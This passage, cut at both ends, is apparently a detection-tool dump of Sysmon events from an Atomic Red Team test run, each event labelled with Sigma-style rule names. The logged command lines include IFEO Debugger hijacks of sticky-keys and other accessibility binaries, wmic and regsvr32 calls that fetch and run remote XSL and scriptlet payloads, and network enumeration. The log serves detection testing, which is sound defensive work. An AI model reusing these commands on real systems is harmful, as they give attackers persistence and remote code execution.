(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"dir c: /b /s .docx | findstr /e .docx\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D88F-5D31-0000-0010BD353200","ParentProcessId":2780,"ProcessGuid":"747F3D96-D890-5D31-0000-001012383200","ProcessId":608,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:52.011"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3725,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:52.048002Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","Sticky Key Like Backdoor Usage"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D89A-5D31-0000-0010F56D3200","ProcessId":3704,"RuleName":"Persistence - IFEO Debugger ValueSet","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe\\Debugger","UtcTime":"2019-07-19 14:50:02.212"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3731,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:50:02.220426Z"}},"Version":2}}}},{"detection":["Godmode Sigma Rule","Sticky Key Like Backdoor Usage"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D89F-5D31-0000-0010BD7F3200","ProcessId":1860,"RuleName":"Persistence - IFEO Debugger 
ValueSet","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger","UtcTime":"2019-07-19 14:50:07.307"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3735,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:50:07.322063Z"}},"Version":2}}}},{"detection":["Godmode Sigma Rule","Sticky Key Like Backdoor Usage"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D8A2-5D31-0000-0010D5913200","ProcessId":2272,"RuleName":"Persistence - IFEO Debugger ValueSet","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\\Debugger","UtcTime":"2019-07-19 14:50:10.275"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3739,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:50:10.295724Z"}},"Version":2}}}},{"detection":["Godmode Sigma Rule","Sticky Key Like Backdoor 
Usage"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D8A5-5D31-0000-0010C39D3200","ProcessId":5000,"RuleName":"Persistence - IFEO Debugger ValueSet","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\magnify.exe\\Debugger","UtcTime":"2019-07-19 14:50:13.137"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3743,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:50:13.153167Z"}},"Version":2}}}},{"detection":["Godmode Sigma Rule","Sticky Key Like Backdoor Usage"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D8A6-5D31-0000-0010A5A93200","ProcessId":5972,"RuleName":"Persistence - IFEO Debugger ValueSet","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\narrator.exe\\Debugger","UtcTime":"2019-07-19 
14:50:14.697"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3747,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:50:14.716040Z"}},"Version":2}}}},{"detection":["Godmode Sigma Rule","Sticky Key Like Backdoor Usage"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D8A9-5D31-0000-0010C0C63200","ProcessId":5124,"RuleName":"Persistence - IFEO Debugger ValueSet","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\DisplaySwitch.exe\\Debugger","UtcTime":"2019-07-19 14:50:17.979"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3751,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:50:17.990891Z"}},"Version":2}}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D8AB-5D31-0000-0010A5D23200","ProcessId":5632,"RuleName":"Persistence - IFEO Debugger 
ValueSet","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\atbroker.exe\\Debugger","UtcTime":"2019-07-19 14:50:19.495"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3755,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:50:19.516948Z"}},"Version":2}}}},{"detection":["XSL Script Processing"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"wmic.exe process /FORMAT:list","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"WMI Commandline Utility","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=4004528344D02FD143DAFD94BFE056041B633E0D,MD5=390B2038C9ED2C94AB505921BC827FC7,SHA256=34C4ED50A3441BD7CB6411749771C637A8C18C791525D8FCB5AE71B0B1969BA6,IMPHASH=AF8CD6625FCE3244397EE550EFF4091E","Image":"C:\\Windows\\System32\\wbem\\WMIC.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"wmic.exe process /FORMAT:list\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D8CF-5D31-0000-00109B603300","ParentProcessId":5380,"ProcessGuid":"747F3D96-D8D0-5D31-0000-0010F3623300","ProcessId":7040,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:50:56.021"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3763,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:50:56.047770Z"}},"Version":5}}}},{"detection":["XSL Script Processing","SquiblyTwo"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"WMI Commandline Utility","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=4004528344D02FD143DAFD94BFE056041B633E0D,MD5=390B2038C9ED2C94AB505921BC827FC7,SHA256=34C4ED50A3441BD7CB6411749771C637A8C18C791525D8FCB5AE71B0B1969BA6,IMPHASH=AF8CD6625FCE3244397EE550EFF4091E","Image":"C:\\Windows\\System32\\wbem\\WMIC.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D8DA-5D31-0000-0010D3833300","ParentProcessId":5340,"ProcessGuid":"747F3D96-D8DA-5D31-0000-001029863300","ProcessId":3220,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:51:06.748"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3766,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:51:06.753240Z"}},"Version":5}}}},{"detection":["Net.exe Execution","Windows Network Enumeration"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"net view /domain","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Net Command","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07","Image":"C:\\Windows\\System32\\net.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"net view /domain\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D8DD-5D31-0000-0010EF923300","ParentProcessId":4856,"ProcessGuid":"747F3D96-D8DD-5D31-0000-001043953300","ProcessId":3012,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:51:09.839"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3769,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:51:09.845415Z"}},"Version":5}}}},{"detection":["Net.exe Execution","Windows Network Enumeration"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"net view","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Net Command","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07","Image":"C:\\Windows\\System32\\net.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"net view\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D8EA-5D31-0000-001030B63300","ParentProcessId":1988,"ProcessGuid":"747F3D96-D8EA-5D31-0000-00108AB83300","ProcessId":4684,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:51:22.330"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3771,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:51:22.333688Z"}},"Version":5}}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Flags Anomaly","Regsvr32 Network Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"regsvr32.exe /s /u /i:C:\\AtomicRedTeam\\atomics\\T1117\\RegSvr32.sct scrobj.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft(C) Register Server","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F","Image":"C:\\Windows\\System32\\regsvr32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"regsvr32.exe /s /u /i:C:\\AtomicRedTeam\\atomics\\T1117\\RegSvr32.sct scrobj.dll\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D976-5D31-0000-001041E83700","ParentProcessId":4444,"ProcessGuid":"747F3D96-D976-5D31-0000-001093EA3700","ProcessId":2332,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:53:42.834"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4033,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:53:42.841951Z"}},"Version":5}}}},{"detection":["Regsvr32 Network Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Company":"Microsoft Corporation","Description":"Windows ® Script Component Runtime","FileVersion":"5.812.10240.16384","Hashes":"SHA1=5B139E692D2A376CCA16D536612EF87AD946EC6B,MD5=3F4DB17E9534DB1CEDA28FF77C27F535,SHA256=14A2C790E3E82DAF7918B61AB79F84228E7CA4494F5C2D311A1179CCA67B02C2,IMPHASH=C928D4D30D6B6FC0A3B011AA381044CA","Image":"C:\\Windows\\System32\\regsvr32.exe","ImageLoaded":"C:\\Windows\\System32\\scrobj.dll","ProcessGuid":"747F3D96-D976-5D31-0000-001093EA3700","ProcessId":2332,"Product":"Microsoft ® Windows ® Script Component Runtime","RuleName":"","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2019-07-19 14:53:42.961"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":4034,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":7,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:53:42.964349Z"}},"Version":3}}}},{"detection":["Regsvr32 Command Line Without 
DLL"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\calc.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Calculator","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729","Image":"C:\\Windows\\System32\\calc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"regsvr32.exe /s /u /i:C:\\AtomicRedTeam\\atomics\\T1117\\RegSvr32.sct scrobj.dll","ParentImage":"C:\\Windows\\System32\\regsvr32.exe","ParentProcessGuid":"747F3D96-D976-5D31-0000-001093EA3700","ParentProcessId":2332,"ProcessGuid":"747F3D96-D977-5D31-0000-00100A0E3800","ProcessId":3848,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:53:43.339"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4035,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:53:43.445040Z"}},"Version":5}}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Flags Anomaly","Regsvr32 Network Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct 
scrobj.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft(C) Register Server","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F","Image":"C:\\Windows\\System32\\regsvr32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D978-5D31-0000-0010442F3800","ParentProcessId":2832,"ProcessGuid":"747F3D96-D978-5D31-0000-0010EB313800","ProcessId":2076,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:53:44.049"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4038,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:53:44.054072Z"}},"Version":5}}}},{"detection":["Regsvr32 Network Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Company":"Microsoft Corporation","Description":"Windows ® Script Component 
Runtime","FileVersion":"5.812.10240.16384","Hashes":"SHA1=5B139E692D2A376CCA16D536612EF87AD946EC6B,MD5=3F4DB17E9534DB1CEDA28FF77C27F535,SHA256=14A2C790E3E82DAF7918B61AB79F84228E7CA4494F5C2D311A1179CCA67B02C2,IMPHASH=C928D4D30D6B6FC0A3B011AA381044CA","Image":"C:\\Windows\\System32\\regsvr32.exe","ImageLoaded":"C:\\Windows\\System32\\scrobj.dll","ProcessGuid":"747F3D96-D978-5D31-0000-0010EB313800","ProcessId":2076,"Product":"Microsoft ® Windows ® Script Component Runtime","RuleName":"","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2019-07-19 14:53:44.103"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":4039,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":7,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:53:44.117123Z"}},"Version":3}}}},{"detection":["Regsvr32 Command Line Without DLL"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\calc.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Calculator","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729","Image":"C:\\Windows\\System32\\calc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct 
scrobj.dll","ParentImage":"C:\\Windows\\System32\\regsvr32.exe","ParentProcessGuid":"747F3D96-D978-5D31-0000-0010EB313800","ParentProcessId":2076,"ProcessGuid":"747F3D96-D97A-5D31-0000-00105DA83800","ProcessId":4336,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:53:46.135"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4041,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:53:46.204886Z"}},"Version":5}}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Network Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\syswow64\\regsvr32.exe\" /s C:\\AtomicRedTeam\\atomics\\T1117\\bin\\AllTheThingsx86.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft(C) Register Server","FileVersion":"10.0.17763.1 